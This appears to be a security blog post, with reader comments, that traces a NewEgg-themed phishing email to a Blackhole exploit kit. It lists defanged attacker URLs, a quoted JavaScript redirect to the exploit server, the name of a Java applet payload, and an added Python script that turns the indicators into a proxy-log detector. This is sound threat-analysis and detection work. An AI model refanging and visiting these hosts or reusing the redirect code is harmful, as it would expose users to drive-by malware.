If you haven't heard yet, there is a phishing email going around masquerading as a NewEgg payment verification.
(Sanitized image from Outlook with no images loaded)
Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):
hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js
All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):
document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';
This points to the final page, containing a Java applet. The file path is obfuscated, partially by hex entities. It loads with parameters:
hxxp://216[dot]224[dot]182[dot]94/data/Klot.jar?a=1
It passes a "code" param, code="ta.tc". The archive contains 3 files:
ta/ta.class
ta/tb.class
ta/tc.class
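The chain above (landing page, three redundant `js.js` redirectors, `showthread.php`, then a `.jar` applet fetched from the same IP) is exactly the shape a proxy log will show for a Blackhole drive-by, so it is worth turning the write-up's indicators into something a defender can run. The following is an added example, not code from the original post: it refangs the defanged URLs into a host watchlist and then scans proxy log lines both for known-host hits and for the generic shape of the chain (third-party `.js`, two HTML hosts, then a `.jar`). The log format and the sample lines are constructed for the example; the 30-second window is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Defanged indicators copied from the write-up above. The refang step also
# tolerates the "[do]" typo variant so a hand-copied IoC still matches.
DEFANGED_IOCS = [
    "hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html",
    "hxxp://congress-assistants[dot]fi/idm2TZP1/js.js",
    "hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js",
    "hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js",
    "hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff",
    "hxxp://216[dot]224[dot]182[dot]94/data/Klot.jar?a=1",
]


def refang(ioc: str) -> str:
    """Turn a defanged URL back into a real one, for matching only (never for browsing)."""
    s = re.sub(r"^hxxps?", lambda m: m.group(0).replace("xx", "tt"), ioc, flags=re.I)
    return re.sub(r"\[(?:dot|\.|do)\]", ".", s, flags=re.I)


def ioc_hosts(iocs) -> set:
    """Host/IP watchlist derived from the defanged URLs."""
    return {urlparse(refang(i)).netloc.lower() for i in iocs}


# Constructed proxy log (not from the page): "epoch client url status content-type".
# Client 10.0.0.5 walks the full chain; 10.0.0.7 is ordinary browsing.
SAMPLE_LOG = """\
1335000000 10.0.0.5 http://ftp.qsari.org/YtWvZiiG/index.html 200 text/html
1335000001 10.0.0.5 http://congress-assistants.fi/idm2TZP1/js.js 200 application/javascript
1335000001 10.0.0.5 http://mobileproductivemoneymaking.com/oExXoVCh/js.js 200 application/javascript
1335000002 10.0.0.5 http://216.224.182.94/showthread.php?t=d7ad916d1c0396ff 200 text/html
1335000003 10.0.0.5 http://216.224.182.94/data/Klot.jar?a=1 200 application/java-archive
1335000010 10.0.0.7 http://www.example.com/news/index.html 200 text/html
1335000011 10.0.0.7 http://www.example.com/static/app.js 200 application/javascript
"""

LOG_RE = re.compile(r"^(\d+) (\S+) (\S+) (\d{3}) (\S+)$")


def parse_log(text: str) -> list:
    """Parse the constructed log format into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, url, status, ctype = m.groups()
        events.append({"ts": int(ts), "client": client, "url": url,
                       "status": int(status), "ctype": ctype})
    return events


def find_driveby_chains(events: list, watchlist: set, window: int = 30) -> dict:
    """Per client, report (a) requests to watchlisted hosts and (b) the generic chain:
    a .jar fetch preceded within `window` seconds by a .js from another host and
    HTML from at least two distinct hosts (landing page plus exploit page)."""
    by_client = defaultdict(list)
    for e in events:
        by_client[e["client"]].append(e)

    findings = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        hits = [e["url"] for e in evs if urlparse(e["url"]).netloc.lower() in watchlist]
        chain = False
        for i, e in enumerate(evs):
            jar = urlparse(e["url"])
            if not jar.path.lower().endswith(".jar"):
                continue
            earlier = [x for x in evs[:i] if e["ts"] - x["ts"] <= window]
            js_hosts = {urlparse(x["url"]).netloc for x in earlier
                        if urlparse(x["url"]).path.lower().endswith(".js")}
            html_hosts = {urlparse(x["url"]).netloc for x in earlier
                          if x["ctype"].startswith("text/html")}
            if (js_hosts - {jar.netloc}) and len(html_hosts) >= 2:
                chain = True
        if hits or chain:
            findings[client] = {"ioc_hits": hits, "redirect_chain_to_jar": chain}
    return findings


if __name__ == "__main__":
    for client, f in find_driveby_chains(parse_log(SAMPLE_LOG), ioc_hosts(DEFANGED_IOCS)).items():
        print(client, f)
```

The host watchlist catches this campaign; the shape check is what still fires after the kit rotates to fresh domains, which is why both are reported separately rather than folded into one score.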
At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind. Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):
https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/
As any good malware used in a phishing campaign should, this file receives a not-so-shocking 0/42. I wonder how many users clicked this? Luckily, the individuals who received this did not do so. Instead, they forwarded it to me for advice. Whew!
Coming up, I'll attempt to dig into analyzing the decompiled Java code...
You are correct in your initial assumption that this is part of the Blackhole exploit kit. Running the showthread stage through Wepawet yielded different payloads.

http://wepawet.cs.ucsb.edu/view.php?hash=c5933047334188c3774d5e5c887ce8e2&type=js
In this run it requests an executable, "Mk4Lf.exe", from hxxp://jmservice[.]servicos[.]ws
In this case it appears to have leveraged a Flash or Shockwave exploit. The file mentioned above is no longer available for analysis. Happy hunting with the class files, and nice write-up!

Thanks man! I didn't get to that part yet :) It's too bad that the PE sample is offline already. I'm not worried... there will be more.

I pulled down the DLL referenced in the Wepawet report.

It gets loaded as a service silently. Time for some behavioral analysis!